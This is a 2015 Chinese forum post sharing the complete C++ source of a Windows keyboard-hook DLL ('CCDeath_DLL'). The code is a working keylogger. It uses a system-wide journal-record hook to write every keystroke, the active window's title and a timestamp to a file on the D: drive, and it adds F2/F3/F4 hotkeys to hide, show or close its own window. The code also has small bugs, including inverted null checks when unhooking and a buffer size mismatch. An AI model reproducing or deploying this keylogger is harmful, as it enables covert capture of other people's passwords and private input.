標(biāo)題: WINDOWS鍵盤(pán)鉤子 [打印本頁(yè)]
作者: liuyy    時(shí)間: 2015-1-11 20:10
標(biāo)題: WINDOWS鍵盤(pán)鉤子
  1. CCDeath_DLL.cpp文件

  3. #include "afx.h"//file頭文件
  4. #include "windows.h"

  6. #pragma data_seg("MySec")//創(chuàng)建一個(gè)節(jié)
  7. HHOOK g_hKeyBoard=NULL;//鍵盤(pán)記錄
  8. HHOOK g_hFuncKeyBoard=NULL;//用來(lái)隱藏和顯示窗口
  9. HWND g_hWnd=NULL;//保存一個(gè)窗口句柄,必須副初值
  10. HWND g_hLastFocusWnd=NULL;//記錄上次得到焦點(diǎn)的窗口句柄
  11. const int g_KeyPressMass=0x80000000;//鍵盤(pán)掩碼常量
  12. char ch=NULL,str[10]={0};//ch保存虛擬鍵的值
  13. FILE *stream=NULL; //文件流輸入文件
  14. HWND g_hCurrentFocusWnd=NULL;//當(dāng)前焦點(diǎn)的窗口句柄
  15. char szTitle[200]={0};//當(dāng)前窗口的名稱
  16. char szTime[100]={0};//當(dāng)前的日期
  17. char g_prevChar=NULL;//保存上一次按鍵值
  18. #pragma data_seg()
  19. #pragma comment(linker,"/section:MySec,RWS")//連接到連接器里面
  20. //
  21. //
  22. //
  23. //處理過(guò)程
  24. LRESULT CALLBACK JournalRecordProc(
  25. int code, // hook code
  26. WPARAM wParam, // undefined
  27. LPARAM lParam // address of message being processed
  28. )
  29. {

  31. if(code==HC_ACTION)
  32. {
  33. EVENTMSG *pEvtMsg = (EVENTMSG *)lParam;
  34. //和時(shí)間
  35. stream = fopen("D:\\CCDeath.txt","a+t");//創(chuàng)建一個(gè)文件流指針向該文件
  36. //處理按鍵消息
  37. if(pEvtMsg->message==WM_KEYDOWN)
  38. {
  39. int vKey= LOBYTE(pEvtMsg->paramL);//取得虛擬鍵值

  41. g_hCurrentFocusWnd=GetForegroundWindow();//取得當(dāng)前活動(dòng)窗口句柄
  42. if(g_hLastFocusWnd!=g_hCurrentFocusWnd)
  43. {
  44. GetWindowText(g_hCurrentFocusWnd,szTitle,256);//獲得標(biāo)題
  45. g_hLastFocusWnd=g_hCurrentFocusWnd;

  47. SYSTEMTIME mytime;//獲得當(dāng)前時(shí)間與日期
  48. GetLocalTime(&mytime);
  49. CString m_time,m_Space,m_Back;

  51. m_time.Format("\r\n記錄時(shí)間:%d年%d月%d日,%02d小時(shí)%d分鐘%d秒\r\n記錄的文件名:",mytime.wYear,mytime.wMonth,\
  52. mytime.wDay,mytime.wHour,mytime.wMinute,mytime.wSecond);
  53. m_Space="\r\n---------------------鍵盤(pán)鉤子為您記錄 BY:DEBUG----------------------";//開(kāi)頭
  54. m_Back="\r\n記錄的內(nèi)容:\r\n";//結(jié)束
  55. fprintf(stream,"%s%s%s%s",m_Space,m_time,szTitle,m_Back);//寫(xiě)入文件
  56. }
  57. //測(cè)試SHIFT,CAPTION,NUMLOCK等鍵是否按下
  58. int IsShift = GetKeyState(0x10);
  59. int IsNumLock = GetKeyState(0x90);
  60. int IsCapsLock = GetKeyState(0x14);
  61. bool bShift=(IsShift & g_KeyPressMass)==g_KeyPressMass;
  62. bool bCapsLock=((IsCapsLock & 1) ==1);
  63. bool bNumLock=((IsNumLock & 1) ==1);
  64. if(vKey>=48 && vKey<=57)//數(shù)字0到9
  65. {
  66. if(!bShift)//shift+1=!上檔鍵
  67. {
  68. fprintf(stream,"%c",vKey);//寫(xiě)入0到九
  69. }
  70. }
  71. if(vKey>=65 && vKey<=90)//字符大寫(xiě)A-Z
  72. {
  73. if(!bCapsLock)//沒(méi)有大小鎖定鍵
  74. {
  75. if(!bShift)//Shit+A=a \A+32=a;
  76. {
  77. ch=vKey+32;

  79. }
  80. else ch=vKey;
  81. }
  82. fprintf(stream,"%c",ch);
  83. }
  84. if (vKey >=96 && vKey<=105) // 小鍵盤(pán)0-9
  85. {
  86. if (bNumLock) fprintf(stream,"%c",vKey-96+48);
  87. }
  88. if (vKey>=186 && vKey<=222) // 其他鍵
  89. {
  90. switch (vKey)
  91. {
  92. case 186:if (!bShift) ch=';'; else ch=':';break;
  93. case 187:if (!bShift) ch='='; else ch='+';break;
  94. case 188:if (!bShift) ch=','; else ch='<' ;break;
  95. case 189:if (!bShift) ch='-'; else ch='_';break;
  96. case 190:if (!bShift) ch='.'; else ch='>';break;
  97. case 191:if (!bShift) ch='/'; else ch='?';break;
  98. case 192:if (!bShift) ch='`'; else ch='~';break;
  99. case 219:if (!bShift) ch='['; else ch='{';break;
  100. case 220:if (!bShift) ch='\\'; else ch='|';break;
  101. case 221:if (!bShift) ch=']'; else ch='}';break;
  102. case 222:if (!bShift) ch='\''; else ch='\"';break;
  103. default:ch='n';break;
  104. }
  105. if (ch!='n') fprintf(stream,"%c",ch); //n是110n回車 此時(shí)應(yīng)該換行才對(duì)


  108. }
  109. if(vKey==9) //TAB
  110. fprintf(stream,"%c",'\t');
  111. if(vKey==13) //回車鍵
  112. fprintf(stream,"%c",'\n');

  114. }

  116. fclose(stream);

  118. return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
  119. }
  120. if(code<0)
  121. {
  122. return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
  123. }
  124. // return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);


  127. }
  128. //用來(lái)程序的隱藏
  129. LRESULT CALLBACK KeyboardProc(
  130. int code, // hook code
  131. WPARAM wParam, // virtual-key code
  132. LPARAM lParam // keystroke-message information
  133. )
  134. {
  135. if(VK_F3==wParam)
  136. {
  137. ShowWindow(g_hWnd,SW_SHOW);
  138. }
  139. if(VK_F2==wParam)
  140. {
  141. ShowWindow(g_hWnd,SW_HIDE);

  143. }
  144. if(VK_F4==wParam)
  145. {
  146. SendMessage(g_hWnd,WM_CLOSE,0,0);
  147. UnhookWindowsHookEx(g_hFuncKeyBoard);
  148. UnhookWindowsHookEx(g_hKeyBoard);

  150. }
  151. return 0;

  153. }





  159. //安裝鉤子
  160. void InstallHook(HWND hWnd)
  161. {
  162. g_hWnd=hWnd;//對(duì)窗口進(jìn)行操作,比如隱藏之類的
  163. if(g_hKeyBoard==NULL)//安全性判斷
  164. {
  165. g_hKeyBoard=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle("CCDeath_DLL"),0);
  166. }
  167. if(g_hFuncKeyBoard==NULL)
  168. {
  169. g_hFuncKeyBoard=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,GetModuleHandle("CCDeath_DLL"),0);
  170. }
  171. }
  172. //御載鉤子
  173. void UnloadHook()
  174. {
  175. if(!g_hKeyBoard)
  176. {
  177. UnhookWindowsHookEx(g_hKeyBoard);
  178. g_hKeyBoard=NULL;
  179. }
  180. if(!g_hFuncKeyBoard)
  181. {
  182. UnhookWindowsHookEx(g_hFuncKeyBoard);
  183. g_hFuncKeyBoard=NULL;
  184. }

  186. }
復(fù)制代碼






歡迎光臨 (http://www.torrancerestoration.com/bbs/) Powered by Discuz! X3.1